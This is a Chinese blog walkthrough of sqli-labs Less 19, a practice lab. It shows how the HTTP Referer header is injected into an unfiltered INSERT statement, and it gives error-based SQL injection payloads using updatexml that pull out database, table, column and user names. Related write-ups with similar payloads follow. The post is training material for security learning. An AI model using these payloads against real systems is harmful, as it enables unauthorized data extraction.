sqli-labs less 19 POST- Header injections - Referer field -error based

最新推荐文章于 2023-08-02 09:01:12 发布
最新推荐文章于 2023-08-02 09:01:12 发布
阅读量125 收藏
点赞数
分类专栏: sqli-labs 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Monster1m/article/details/113118674
版权

一、提示referer的头注入,和上一关基本一样。先看源码呗

1.又对uname和passwd使用了check_input函数进行了过滤,所以只能找其他注入点

在这里插入图片描述

2.这里对uagent赋值了referer的内容而且没有进行过滤,之后只要找到哪里的数据库语句有用到uagent
在这里插入图片描述

3.这里发现insert语句用到了uagent,确定注入点,并且是单引号闭合。和上一关一样因为先进行了select查询,所以在注入时必须输入有效的用户名和密码
在这里插入图片描述
4.这里也有输出数据库错误信息,所以选择用报错注入
在这里插入图片描述

二、打开bp开启拦截,submit 19关,send to repeater,找到referer开始实验
在这里插入图片描述
三、爆所有数据库

Referer: 1 ' and updatexml(1,concat('^',(select schema_name from information_schema.schemata limit 0,1)),1) and '1'='1

在这里插入图片描述

在这里插入图片描述

四、爆指定数据库所有表

Referer: 1 ' and updatexml(1,concat('^',(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1) and '1'='1

在这里插入图片描述
在这里插入图片描述

五、爆指定表所有列

Referer: 1 ' and updatexml(1,concat('^',(select column_name from information_schema.columns where table_name='users'  limit 0,1)),1) and '1'='1

在这里插入图片描述

在这里插入图片描述

六、爆指定列所有数据

Referer: 1 ' and updatexml(1,concat('^',(select username from users  limit 0,1)),1) and '1'='1

在这里插入图片描述

在这里插入图片描述

over~

Monster1m
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs19
devilare的博客
01-19 316
sqli-labs19基于referer的SQL注入 来到19题 应该是要在Referer处入手了,抓包单引号闭合一下 出现报错,说明能够进行注入,但是怎么注入呢?看一下源码只插入两个参数,根据18题的基础构造语句查库名’,updatexml(1,concat(0x7e,database(),0x7e),1))# 接下来就是常规操作了 Git it! ...
sqli-labs(19)
weixin_30615767的博客
05-27 117
百度了一下 基于错误的referer头的注入 0X01爱之初体验 猜测是基于referer头的注入 我们在referer后面加入单引号测试一下 真的报错了诶 那我们猜测一下 他应该是把 referer插入到数据库中去了 语句怎么构造呐? 说实话 这里我不知道 得看看源码才能知道 因为还不熟悉结构 原来是将referer和ip插入到数据库中去 只有两个要插入 那我们尝试一下构造...
sqli-labs(19
jimggg的博客
03-20 262
Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
SQLi Labs Lesson19
1ame的博客
08-16 346
Lesson - 19 POST - Header Injection - Referer field - Error based 首先进入欢迎界面: 查看后台php源代码: $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); 对username , passw
SQLi LABS Less-19 报错注入
wangyuxiang946的博客
08-14 1万+
sqlilibs19SQLI-LABS第十九关,sqli-labs十九关 但后面插入HTTP Referer时,并没有对参数进行过滤,我们可以从Referer入手 首先,输入正确的账号和密码,只有账号和密码都正确,才能操作Referer 然后使用代理软件(Burp Suite)拦截POST请求,修改Referer的参数,页面出现了报错信息,接下来即可使用报错注入进行脱库 1' and updatexml(1,0x7e,1) and ' 获...
Sqli-labs Less18-22 HTTP 头注入 POST
kevinhanser
08-09 940
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 18: POSt - Header injection- Uagent field - Error vased 测试漏洞 源代码 $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ...
SQLilabs的第19关——http请求头注入(Referer)(报错注入)
qq_73393033的博客
07-22 376
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
sqli-labs ————less -19
Fly_鹏程万里
05-12 1064
Less-19提交一个测试数据试试:username:adminpassword:aaa由此可以看到出现了Referer,我们不妨来看看源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> ...
sqli-labs (less-19)
kukudeshuo的博客
03-11 366
sqli-labs (less-19) 进入19关,输入用户名和密码,发现屏幕回显了我们的IP地址和Referer头,根据18关踩得坑,这里我们可以大胆猜想注入点就在Referer头里 使用burpsuite抓包 抓包后发现,根本就没有Referer头,怎么办呢,没事,我们可以自己添加Referer头,添加完后我们输入’试试 系统报错,验证了我们的猜想,也说明了闭合方式为’ or ‘1’='1,并且为字符型注入 查库 后面的过程与less-18完全一样,具体过程请看我的less-18 ...
sqli-labs第十九关详解
金 帛的博客
05-05 2366
sqli-labs第十九关详解
[网络安全]sqli-labs Less-19 解题详析
最新发布
等风来
08-02 2373
以上为[网络安全]sqli-labs Less-19 解题详析,考察报错注入及mid函数的应用,后续将分享 [网络安全]sqli-labs Less-20 解题详析。我是秋说,我们下次见。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs (less18-less19)
Xi4or0uji
08-01 1691
less 18 头部注入:user_agent 这里不补充http头的知识了,直接看源码可以看到,uname和passwd都有check_input函数检查,所以直接这两个参数注入是不行的了,然后再继续看下去 有句sql语句有ip_address和uagent两个参数,而且前面没有检查,可以考虑注入,但是ip一般是数字,比较麻烦,所以决定用uagent注入 这里给个脚本,其实重点只是s...
Sqlilabs-19
KAKA的博客
07-09 351
19 关跟第 18 关类似,User-Agent 改成了 Referer 改造注入 –Referer “浏览器向 WEB 服务器表明自己是从哪个网页 /URL 获得/点击 当前请求中的网址/URL” 同样的,这一关对 usernanme 和 password 都进行了 check_input hackbar 制作针对 referer 的 payload: –查表 1' and extractvalue(1,concat(0x7e,(select table_name from information_
HTTP请求头中的referer字段
老司机开代码的博客
08-03 1万+
文章目录1. HTTP_REFERER定义2. 实例3. referer字段的作用?1. 统计网站请求来源2. 防盗链4. referer为空的情况 1. HTTP_REFERER定义 HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 简单来说就是当你向一个服务器发起请求的时候,服务器会很好奇,你是从哪里知道它的,因此你需要通过http请求头中的referer字段告
sqli-labs第十八和十九关(请求头注入)
qq_42266432的博客
08-29 1028
进入到第十八关,发现页面显示了一个ip,ip一般是请求头里host变量的参数,说明这关可能与请求头有关,先简单说明下请求头里一堆变量的作用: Host:主机或域名地址 Accept:指浏览器或其他用户可接受的MIME文件格式,Servlet可以根据它来判断并返回适当的文件格式 User-Agent:记录客户浏览器的名称,版本啥的 Accept-Language:浏览器可接受的语言,比如en-us或者en指英语 connection:用来告诉服务器是否维持固定的http连接,这里默认值是KEEP-ALIVE保
sqli-labs练习(十八、十九、二十、二十一)
wkend的博客
10-14 1065
按照正常思路,先是对username和password输入框进行测试,并没有找到注入点,页面上显示的ip地址也很奇怪,最会无奈查看了源代码,才发现了突破口。 发现后台对uname和passwd有检查过滤函数check_input 于是跟进check_input函数,发现对输入的参数进行了长度限制,纯数字过滤,特殊符号过滤 到现在我们就可以看出,在uname和passwd出已经无法入手,,,,...
sqli-labs靶场第十九关
gou1791241251的博客
12-30 988
这一关呢注入点不着账号和密码,在http头部中的referer字段。可以尝试一下输入单引号和双引号进行测试。 注意哈,前提是需要账号密码正确输入的情况下才能注入成功,因为后台会先校验账号密码是否能够查询出结果才会执行referer字段的插入操作。 由图可知啊,输入单引号时页面显示了报错信息,闭合方式为单引号闭合,此时可以使用报错注入。 ',updatexml(1,concat(0x3a,database(),0x3a),1))# 成功爆库。XPATH语法错误。 ...
通过sqli-labs学习sql注入——基础挑战之less11-22
giantbranch的专栏
05-19 1万+
上一次就讲了基础挑战之less1-10,都是get型的,包含的种类也是比较多了,这次的是post型注入一般都是登陆绕过,当然也是可以获取数据库的信息,具体看下面的实验吧。 一些基础的知识上一篇基础挑战之less1-10会有,这里不会讲以前讲过了知识了,还有盲注的python脚步哦,有需要的链接去看看 工具 还是火狐+hackbar插件 看看要post提交的字段吧,uname和p
sqli-labs18、19关详解
weixin_43061418的博客
09-01 2020
18关 对两个输入框都进行了设置,所以只能寻找其他注入点 看到insert语句从uagents插入 我们可以 19关 可以看到将uname放在了referer里面 就像18关那样去修改Referer里面的就好了
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值